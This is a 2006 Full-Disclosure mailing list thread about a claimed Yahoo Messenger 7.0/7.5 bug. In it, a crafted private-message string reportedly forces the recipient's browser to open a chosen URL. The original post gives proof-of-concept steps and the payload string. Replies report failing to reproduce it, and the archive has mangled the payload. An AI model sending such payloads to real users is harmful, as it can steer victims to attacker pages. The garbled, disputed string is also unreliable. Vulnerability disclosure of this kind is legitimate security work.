Re: [Full-disclosure] Yahoo messenger serious bug
I have a private PoC for this now for a few months, it does work ( although the PoC is slightly different and only requires one msg string to be sent ). cheers, MW ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Yahoo messenger serious bug
didnt' work for me either.On 7/28/06, John Dietz <[EMAIL PROTECTED]> wrote: I just tried this in Mesenger 7.0 and it never opened a browser window. I copied the text exactly from here and made sure the space after helomsg was [Alt]+0160 and the most I could get it to do was do a Yahoo Search on the string. Other side sees: s: helomsg :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: - :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: - :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?( Yahoo! Search: No results were found for helomsg :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg : - :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: - :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(. There must be some other settings on either mesenger or the computer itself for this to work as you say. Possibly a setting for mesenger to use your default browser for searches in stead of the PM window? Cheers On 7/28/06, Ivan Ivan <[EMAIL PROTECTED] > wrote: Hi,I found another vulnerability in yahoo messenger thatif you receive a Private message with this string "helomsg:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:- PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:- PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?("(without quotes) Yahoo messenger open in this case google.com in the internet explorer of the remote victim.Yahoo messenger bug proof of concept:1. Open messenger and log it.2. Open a yahoo chat third party like yahelite throughYmsgr protocol and log it with another account.3. Send a Pm to the messenger account with this string: s: helomsg:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:->:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:->:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(4. The remote user will open www.google.com (you canchange)Note: "helomsg :" this space must be created with alt+0160 and this "s: " with a spaces:[space]helomsg[alt+0160]:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:- PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:- PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(Tested in yahoo messenger 7.0/7.5Regards.__ Preguntá. Respondé. Descubrí.Todo lo que querías saber, y lo que ni imaginabas,está en Yahoo! Respuestas (Beta).¡Probalo ya! http://www.yahoo.com.ar/respuestas ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- There is intelligence is in having all the answers, but wisdom lies in knowing which of the questions to answer. ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ -- -- h0 h0 h0 --www.nopsled.net ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Yahoo messenger serious bug
I just tried this in Mesenger 7.0 and it never opened a browser window. I copied the text exactly from here and made sure the space after helomsg was [Alt]+0160 and the most I could get it to do was do a Yahoo Search on the string. Other side sees: s: helomsg :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: - :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: - :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?( Yahoo! Search: No results were found for helomsg :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: - :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg: - :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(. There must be some other settings on either mesenger or the computer itself for this to work as you say. Possibly a setting for mesenger to use your default browser for searches in stead of the PM window? Cheers On 7/28/06, Ivan Ivan <[EMAIL PROTECTED]> wrote: Hi,I found another vulnerability in yahoo messenger thatif you receive a Private message with this string "helomsg:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:- PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:- PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?("(without quotes) Yahoo messenger open in this casegoogle.com in the internet explorer of the remote victim.Yahoo messenger bug proof of concept:1. Open messenger and log it.2. Open a yahoo chat third party like yahelite throughYmsgr protocol and log it with another account.3. Send a Pm to the messenger account with this string: s: helomsg:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:->:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:->:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(4. The remote user will open www.google.com (you canchange)Note: "helomsg :" this space must be created with alt+0160 and this "s: " with a spaces:[space]helomsg[alt+0160]:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:- PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:- PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(Tested in yahoo messenger 7.0/7.5Regards.__ Preguntá. Respondé. Descubrí.Todo lo que querías saber, y lo que ni imaginabas,está en Yahoo! Respuestas (Beta).¡Probalo ya!http://www.yahoo.com.ar/respuestas ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/-- There is intelligence is in having all the answers, but wisdom lies in knowing which of the questions to answer. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Yahoo messenger serious bug
Hi, I found another vulnerability in yahoo messenger that if you receive a Private message with this string "helomsg:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:-helomsg:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:-helomsg:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(" (without quotes) Yahoo messenger open in this case google.com in the internet explorer of the remote victim. Yahoo messenger bug proof of concept: 1. Open messenger and log it. 2. Open a yahoo chat third party like yahelite through Ymsgr protocol and log it with another account. 3. Send a Pm to the messenger account with this string: s: helomsg :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:-helomsg :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:-helomsg :+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?( 4. The remote user will open www.google.com (you can change) Note: "helomsg :" this space must be created with alt+0160 and this "s: " with a space s:[space]helomsg[alt+0160]:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:-helomsg[alt+0160]:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?(msg:-helomsg[alt+0160]:+)-(%/?#()(=(/;[EMAIL PROTECTED](@;+?/(?#@@*-)[EMAIL PROTECTED]@;?( Tested in yahoo messenger 7.0/7.5 Regards. __ Preguntá. Respondé. Descubrí. Todo lo que querías saber, y lo que ni imaginabas, está en Yahoo! Respuestas (Beta). ¡Probalo ya! http://www.yahoo.com.ar/respuestas ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/